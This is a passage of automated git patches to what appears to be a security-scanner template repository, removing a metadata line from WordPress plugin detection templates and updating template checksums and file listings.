   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
-    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
-    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
-    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
-    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
-    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
-    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
-    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
-    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
-    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index fba45020e4..56dfdf4a59 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 0178c8e9fb..810fc82cde 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
-    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 017cf76f11..2276545093 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
-    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
-    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index bc83478f06..27f6d46c2b 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
-    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
-    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
-    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
-    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
-    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
-    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
-    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From f5e9a09038e7d27a63eca555234db270664811b8 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sat, 23 Sep 2023 09:16:10 +0000
Subject: [PATCH 0491/1090] Auto Generated Templates Checksum [Sat Sep 23
 09:16:10 UTC 2023] :robot:

---
 templates-checksum.txt | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index f134fe7e25..5985451463 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -385,7 +385,7 @@ helpers/wordpress/plugins/broken-link-checker.txt:53847c48faeb5e255ebcdd1a4762a5
 helpers/wordpress/plugins/child-theme-configurator.txt:8e805063c85859847271163a1c51e5865e460aea
 helpers/wordpress/plugins/classic-editor.txt:933c3d96b7fbc319e2e08dda5c340797d7c8d99f
 helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09286693
-helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:a81ab9d3802932cf95bd34d57f3554c73559eeae
+helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:a9ea03b69a8a6f65d4bfc303872069ac5070fa1c
 helpers/wordpress/plugins/cloudflare.txt:95b4f085ec6b3a33a23781c7cfda78c317e5dca1
 helpers/wordpress/plugins/cmb2.txt:12291cb9150686dd1175c2a1662b9d1acd8b9b62
 helpers/wordpress/plugins/coblocks.txt:67de27fd6cf8d4bc1ad0b22499ec7f87a1acf6c4
@@ -414,7 +414,7 @@ helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930c
 helpers/wordpress/plugins/easy-wp-smtp.txt:32fecb37588747cdb8227230edc41ff2ca6557e1
 helpers/wordpress/plugins/elementor.txt:7a8d382588d05ad4101faadabc1f1b04a42eaada
 helpers/wordpress/plugins/elementskit-lite.txt:40d69a31b1f9d238ca1c38a357e6846c514e2e9f
-helpers/wordpress/plugins/enable-media-replace.txt:93cd63d42092dfdf799d4cecf593fe4d574f77dd
+helpers/wordpress/plugins/enable-media-replace.txt:9301d028023f0b8d0d7bac4531bbd63703d358da
 helpers/wordpress/plugins/envato-elements.txt:fefed34c88a4926b37d965db8c15fed2727796a6
 helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:59c6b6abae4f481ef509a10767fab68cb112f327
 helpers/wordpress/plugins/ewww-image-optimizer.txt:f0e80e9d8b6e35e4d07b971ea614c40d8ec4efa3
@@ -521,7 +521,7 @@ helpers/wordpress/plugins/the-events-calendar.txt:da12d3bdce91425575a83cf92ced2c
 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940
 helpers/wordpress/plugins/translatepress-multilingual.txt:8e805063c85859847271163a1c51e5865e460aea
-helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:14507aa9246588cbf1725303a1878c660615d91a
+helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:d55168255aa04b62d234cc7484cbe6a6ae8b8d1a
 helpers/wordpress/plugins/under-construction-page.txt:7b482eb97a0d1e20b8b333a7435ce0e0bc59d15f
 helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d
 helpers/wordpress/plugins/updraftplus.txt:ef52ef5de56c32d1410d7eb141c26ff4e9fbe4b4
@@ -2724,7 +2724,7 @@ http/default-logins/jboss/jmx-default-login.yaml:07c7b5009ff9ee4ac3b2e990acff013
 http/default-logins/jenkins/jenkins-default.yaml:ab4ccb7f7c87c0f301664eb002827773bce701f9
 http/default-logins/jinher/jinher-oa-default-login.yaml:7b6f694950b7978486d7372670663c9f30e4934a
 http/default-logins/jupyterhub/jupyterhub-default-login.yaml:501f2ac22106ea0073d1ac2c0c083455437cf85c
-http/default-logins/kanboard-default-login.yaml:a4f10800567ca5d353806c0c9c99c23090847dc8
+http/default-logins/kanboard-default-login.yaml:40a2c8e074e8dab520a814aaebda300e18b9416b
 http/default-logins/kettle/kettle-default-login.yaml:69e19c0142a96a07da2c294618bd9400b541b11e
 http/default-logins/leostream/leostream-default-login.yaml:15df73e1f5c5dcc5466e644310d77c82be187638
 http/default-logins/lutron/lutron-default-login.yaml:b928bf13b91efcdd0724bbc072bd47fdc1f04ae8
@@ -7186,7 +7186,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:a7a1203f0524f3a186c5a1c456ed3b71fd250bcf
+templates-checksum.txt:4d89cb9dd12f445a688ff9dd66345e217d3db787
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 4b288b9cc01c9e6458bc383502da46637eaec4fc Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sat, 23 Sep 2023 09:17:39 +0000
Subject: [PATCH 0492/1090] TemplateMan Update [Sat Sep 23 09:17:39 UTC 2023]
 :robot:

---
 http/technologies/wordpress/plugins/ad-inserter.yaml             | 1 +
 http/technologies/wordpress/plugins/add-to-any.yaml              | 1 +
 http/technologies/wordpress/plugins/admin-menu-editor.yaml       | 1 +
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml  | 1 +
 http/technologies/wordpress/plugins/akismet.yaml                 | 1 +
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml          | 1 +
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml     | 1 +
 http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 +
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml   | 1 +
 http/technologies/wordpress/plugins/amp.yaml                     | 1 +
 http/technologies/wordpress/plugins/antispam-bee.yaml            | 1 +
 http/technologies/wordpress/plugins/astra-sites.yaml             | 1 +
 http/technologies/wordpress/plugins/astra-widgets.yaml           | 1 +
 http/technologies/wordpress/plugins/autoptimize.yaml             | 1 +
 http/technologies/wordpress/plugins/backwpup.yaml                | 1 +
 http/technologies/wordpress/plugins/better-search-replace.yaml   | 1 +
 http/technologies/wordpress/plugins/better-wp-security.yaml      | 1 +
 .../wordpress/plugins/black-studio-tinymce-widget.yaml           | 1 +
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml        | 1 +
 http/technologies/wordpress/plugins/breeze.yaml                  | 1 +
 http/technologies/wordpress/plugins/broken-link-checker.yaml     | 1 +
 .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 +
 http/technologies/wordpress/plugins/classic-editor.yaml          | 1 +
 http/technologies/wordpress/plugins/classic-widgets.yaml         | 1 +
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml            | 1 +
 http/technologies/wordpress/plugins/cmb2.yaml                    | 1 +
 http/technologies/wordpress/plugins/coblocks.yaml                | 1 +
 http/technologies/wordpress/plugins/code-snippets.yaml           | 1 +
 http/technologies/wordpress/plugins/coming-soon.yaml             | 1 +
 http/technologies/wordpress/plugins/complianz-gdpr.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 +
 http/technologies/wordpress/plugins/contact-form-7.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml      | 1 +
 http/technologies/wordpress/plugins/cookie-law-info.yaml         | 1 +
 http/technologies/wordpress/plugins/cookie-notice.yaml           | 1 +
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml      | 1 +
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml     | 1 +
 http/technologies/wordpress/plugins/custom-css-js.yaml           | 1 +
 http/technologies/wordpress/plugins/custom-fonts.yaml            | 1 +
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml     | 1 +
 http/technologies/wordpress/plugins/disable-comments.yaml        | 1 +
 http/technologies/wordpress/plugins/disable-gutenberg.yaml       | 1 +
 http/technologies/wordpress/plugins/duplicate-page.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicate-post.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicator.yaml              | 1 +
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml       | 1 +
 http/technologies/wordpress/plugins/easy-fancybox.yaml           | 1 +
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml  | 1 +
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/elementor.yaml               | 1 +
 http/technologies/wordpress/plugins/elementskit-lite.yaml        | 1 +
 http/technologies/wordpress/plugins/enable-media-replace.yaml    | 1 +
 http/technologies/wordpress/plugins/envato-elements.yaml         | 1 +
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml   | 1 +
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml    | 1 +
 .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 +
 http/technologies/wordpress/plugins/fast-indexing-api.yaml       | 1 +
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml       | 1 +
 http/technologies/wordpress/plugins/flamingo.yaml                | 1 +
 http/technologies/wordpress/plugins/fluentform.yaml              | 1 +
 http/technologies/wordpress/plugins/font-awesome.yaml            | 1 +
 .../wordpress/plugins/force-regenerate-thumbnails.yaml           | 1 +
 http/technologies/wordpress/plugins/formidable.yaml              | 1 +
 http/technologies/wordpress/plugins/forminator.yaml              | 1 +
 http/technologies/wordpress/plugins/ga-google-analytics.yaml     | 1 +
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml  | 1 +
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml     | 1 +
 .../wordpress/plugins/google-analytics-for-wordpress.yaml        | 1 +
 http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 +
 http/technologies/wordpress/plugins/google-site-kit.yaml         | 1 +
 .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 +
 http/technologies/wordpress/plugins/gtranslate.yaml              | 1 +
 http/technologies/wordpress/plugins/gutenberg.yaml               | 1 +
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml  | 1 +
 .../wordpress/plugins/header-footer-code-manager.yaml            | 1 +
 http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 +
 http/technologies/wordpress/plugins/header-footer.yaml           | 1 +
 http/technologies/wordpress/plugins/health-check.yaml            | 1 +
 http/technologies/wordpress/plugins/hello-dolly.yaml             | 1 +
 http/technologies/wordpress/plugins/host-webfonts-local.yaml     | 1 +
 http/technologies/wordpress/plugins/imagify.yaml                 | 1 +
 http/technologies/wordpress/plugins/imsanity.yaml                | 1 +
 .../wordpress/plugins/insert-headers-and-footers.yaml            | 1 +
 http/technologies/wordpress/plugins/instagram-feed.yaml          | 1 +
 .../wordpress/plugins/intuitive-custom-post-order.yaml           | 1 +
 http/technologies/wordpress/plugins/iwp-client.yaml              | 1 +
 http/technologies/wordpress/plugins/jetpack-boost.yaml           | 1 +
 http/technologies/wordpress/plugins/jetpack.yaml                 | 1 +
 http/technologies/wordpress/plugins/kadence-blocks.yaml          | 1 +
 http/technologies/wordpress/plugins/kirki.yaml                   | 1 +
 http/technologies/wordpress/plugins/leadin.yaml                  | 1 +
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml         | 1 +
 http/technologies/wordpress/plugins/limit-login-attempts.yaml    | 1 +
 http/technologies/wordpress/plugins/litespeed-cache.yaml         | 1 +
 http/technologies/wordpress/plugins/loco-translate.yaml          | 1 +
 http/technologies/wordpress/plugins/loginizer.yaml               | 1 +
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml        | 1 +
 http/technologies/wordpress/plugins/mailpoet.yaml                | 1 +
 http/technologies/wordpress/plugins/maintenance.yaml             | 1 +
 http/technologies/wordpress/plugins/mainwp-child.yaml            | 1 +
 http/technologies/wordpress/plugins/malcare-security.yaml        | 1 +
 http/technologies/wordpress/plugins/megamenu.yaml                | 1 +
 http/technologies/wordpress/plugins/members.yaml                 | 1 +
 http/technologies/wordpress/plugins/meta-box.yaml                | 1 +
 http/technologies/wordpress/plugins/ml-slider.yaml               | 1 +
 http/technologies/wordpress/plugins/newsletter.yaml              | 1 +
 .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 +
 http/technologies/wordpress/plugins/nextgen-gallery.yaml         | 1 +
 http/technologies/wordpress/plugins/ninja-forms.yaml             | 1 +
 http/technologies/wordpress/plugins/ocean-extra.yaml             | 1 +
 http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 +
 http/technologies/wordpress/plugins/one-click-demo-import.yaml   | 1 +
 http/technologies/wordpress/plugins/optinmonster.yaml            | 1 +
 http/technologies/wordpress/plugins/otter-blocks.yaml            | 1 +
 http/technologies/wordpress/plugins/password-protected.yaml      | 1 +
 http/technologies/wordpress/plugins/pdf-embedder.yaml            | 1 +
 .../wordpress/plugins/pinterest-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/pixelyoursite.yaml           | 1 +
 http/technologies/wordpress/plugins/polylang.yaml                | 1 +
 http/technologies/wordpress/plugins/popup-builder.yaml           | 1 +
 http/technologies/wordpress/plugins/popup-maker.yaml             | 1 +
 http/technologies/wordpress/plugins/post-smtp.yaml               | 1 +
 http/technologies/wordpress/plugins/post-types-order.yaml        | 1 +
 .../wordpress/plugins/premium-addons-for-elementor.yaml          | 1 +
 http/technologies/wordpress/plugins/pretty-link.yaml             | 1 +
 http/technologies/wordpress/plugins/really-simple-captcha.yaml   | 1 +
 http/technologies/wordpress/plugins/really-simple-ssl.yaml       | 1 +
 http/technologies/wordpress/plugins/redirection.yaml             | 1 +
